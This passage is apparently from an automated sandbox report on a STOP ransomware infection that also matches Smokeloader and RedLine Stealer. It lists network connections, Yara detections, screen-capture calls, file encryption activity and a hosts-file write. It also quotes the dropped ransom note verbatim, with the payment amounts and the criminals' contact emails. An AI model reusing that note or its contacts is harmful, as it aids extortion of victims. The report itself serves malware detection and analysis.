Source: D3CC.exe, 00000015.00000003.2212428849.0000000003FBE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: D3CC.exe, 00000015.00000003.2212428849.0000000003FBE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: explorer.exe, 00000001.00000000.1702723617.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2311006049.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2297814963.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2905755218.0000000007C00000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2293627468.0000000007C18000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2301195444.0000000007C01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000001.00000000.1702723617.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2311006049.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2297814963.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2905755218.0000000007C00000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2293627468.0000000007C18000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2301195444.0000000007C01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000001.00000000.1702723617.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1702723617.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2311006049.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2297814963.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2905755218.0000000007C00000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2293627468.0000000007C18000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2301195444.0000000007C01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000001.00000000.1702723617.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2311006049.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2297814963.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2905755218.0000000007C00000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2293627468.0000000007C18000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2301195444.0000000007C01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000021.00000003.2297814963.0000000007BF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000001.00000000.1702723617.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2311006049.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2297814963.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2905755218.0000000007C00000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2293627468.0000000007C18000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2301195444.0000000007C01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000001.00000000.1702723617.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2311006049.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2297814963.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2905755218.0000000007C00000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2293627468.0000000007C18000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2301195444.0000000007C01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000001.00000000.1702723617.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2311006049.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2297814963.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2905755218.0000000007C00000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2293627468.0000000007C18000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2301195444.0000000007C01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000001.00000000.1702723617.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2311006049.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2297814963.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2905755218.0000000007C00000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2293627468.0000000007C18000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2301195444.0000000007C01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000001.00000000.1702723617.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000001.00000000.1702723617.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2311006049.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2297814963.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2905755218.0000000007C00000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2293627468.0000000007C18000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2301195444.0000000007C01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000001.00000000.1702723617.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2311006049.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2297814963.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2905755218.0000000007C00000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2293627468.0000000007C18000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2301195444.0000000007C01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000001.00000000.1702723617.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2311006049.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2297814963.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2905755218.0000000007C00000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2293627468.0000000007C18000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2301195444.0000000007C01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000021.00000003.2297260361.0000000007BDE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2301195444.0000000007C01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000001.00000000.1702723617.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2311006049.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2297814963.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2905755218.0000000007C00000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2293627468.0000000007C18000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2301195444.0000000007C01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000001.00000000.1702723617.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2311006049.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2297814963.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2905755218.0000000007C00000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2293627468.0000000007C18000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2301195444.0000000007C01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 103.247.10.118:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.177.98:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.177.98:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.177.98:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.177.98:443 -> 192.168.2.4:49774 version: TLS 1.2
Source: unknown HTTPS traffic detected: 192.185.16.114:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.177.98:443 -> 192.168.2.4:49778 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.177.98:443 -> 192.168.2.4:49781 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.9.138:443 -> 192.168.2.4:49783 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.177.98:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49790 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49791 version: TLS 1.2
Source: unknown HTTPS traffic detected: 103.247.10.118:443 -> 192.168.2.4:49789 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: Yara match File source: 00000005.00000002.1986547068.0000000002EF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1986391859.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1719529460.0000000002FD1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1718695022.0000000002C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_004822E0 CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetObjectA,BitBlt,GetBitmapBits,SelectObject,DeleteObject,DeleteDC,DeleteDC,DeleteDC, 10_2_004822E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Temp\TmpCED8.tmp Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Temp\TmpCEF8.tmp Jump to dropped file

Spam, unwanted Advertisements and Ransom Demands

barindex
Source: C:\Users\user\AppData\Local\VirtualStore\_README.txt Dropped file: ATTENTION!Don't worry, you can return all your files!All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.The only method of recovering files is to purchase decrypt tool and unique key for you.This software will decrypt all your encrypted files.What guarantees you have?You can send one of your encrypted file from your PC and we decrypt it for free.But we can decrypt only 1 file for free. File must not contain valuable information.Do not ask assistants from youtube and recovery data sites for help in recovering your data.They can use your free decryption quota and scam you.Our contact is emails in this text document only.You can get and look video overview decrypt tool:https://wetransfer.com/downloads/df01994dd8d37c2c33469922f8e7155a20240402134014/fd95b0Price of private key and decrypt software is $999.Discount 50% available if you contact us first 72 hours, that's price for you is $499.Please note that you'll never restore your data without payment.Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.To get this software you need write on our e-mail:support@freshingmail.topReserve e-mail address to contact us:datarestorehelpyou@airmail.ccYour personal ID:0859PsawqSSLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P Jump to dropped file
Source: Yara match File source: Process Memory Space: A5B6.exe PID: 5516, type: MEMORYSTR
Source: Yara match File source: 9.2.A5B6.exe.49b15a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.A5B6.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.A5B6.exe.49915a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.A5B6.exe.49b15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.A5B6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.A5B6.exe.49b15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.A5B6.exe.4a715a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.A5B6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.A5B6.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.A5B6.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.A5B6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.A5B6.exe.49b15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.A5B6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.A5B6.exe.4a715a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.A5B6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.A5B6.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.A5B6.exe.49b15a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.A5B6.exe.49b15a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.A5B6.exe.49915a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.A5B6.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.2068427651.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2190525495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2028759696.00000000049B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2276060736.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2266063708.0000000004990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2076702437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2181665321.00000000049B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2898265462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2078107088.00000000049B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2900242612.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2049909948.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: A5B6.exe PID: 7088, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: A5B6.exe PID: 7148, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: A5B6.exe PID: 1312, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: A5B6.exe PID: 2496, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: A5B6.exe PID: 5888, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: A5B6.exe PID: 5516, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: A5B6.exe PID: 6844, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: A5B6.exe PID: 4592, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: A5B6.exe PID: 7140, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: A5B6.exe PID: 2472, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe File moved: C:\Users\user\Desktop\XZXHAVGRAG\XZXHAVGRAG.docx
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe File deleted: C:\Users\user\Desktop\XZXHAVGRAG\XZXHAVGRAG.docx
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe File moved: C:\Users\user\Desktop\DTBZGIOOSO\ONBQCLYSPU.pdf
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe File deleted: C:\Users\user\Desktop\DTBZGIOOSO\ONBQCLYSPU.pdf
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe File moved: C:\Users\user\Desktop\DVWHKMNFNN.xlsx
Source: C:\Users\user\AppData\Local\Temp\filename.exe File written: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe File dropped: C:\Users\user\AppData\Local\VirtualStore\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/df01994dd8d37c2c33469922f8e7155a20240402134014/fd95b0price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address Jump to dropped file
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe File dropped: C:\Users\user\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/df01994dd8d37c2c33469922f8e7155a20240402134014/fd95b0price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address Jump to dropped file

System Summary

barindex
Source: 9.2.A5B6.exe.49b15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.2.A5B6.exe.49b15a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 24.2.A5B6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 24.2.A5B6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 28.2.A5B6.exe.49915a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 28.2.A5B6.exe.49915a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.2.A5B6.exe.49b15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.2.A5B6.exe.49b15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.2.A5B6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.2.A5B6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.2.A5B6.exe.49b15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.2.A5B6.exe.49b15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 14.2.A5B6.exe.4a715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 14.2.A5B6.exe.4a715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 10.2.A5B6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 10.2.A5B6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.2.A5B6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 16.2.A5B6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 10.2.A5B6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 10.2.A5B6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 29.2.A5B6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 29.2.A5B6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 23.2.A5B6.exe.49b15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 23.2.A5B6.exe.49b15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 24.2.A5B6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 24.2.A5B6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 14.2.A5B6.exe.4a715a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 14.2.A5B6.exe.4a715a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.2.A5B6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 16.2.A5B6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 29.2.A5B6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 29.2.A5B6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 23.2.A5B6.exe.49b15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 23.2.A5B6.exe.49b15a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.2.A5B6.exe.49b15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.2.A5B6.exe.49b15a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 28.2.A5B6.exe.49915a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 28.2.A5B6.exe.49915a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.2.A5B6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.2.A5B6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000E.00000002.2068427651.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000005.00000002.1986277821.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000018.00000002.2190525495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000018.00000002.2190525495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000002.2028556101.0000000002F21000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
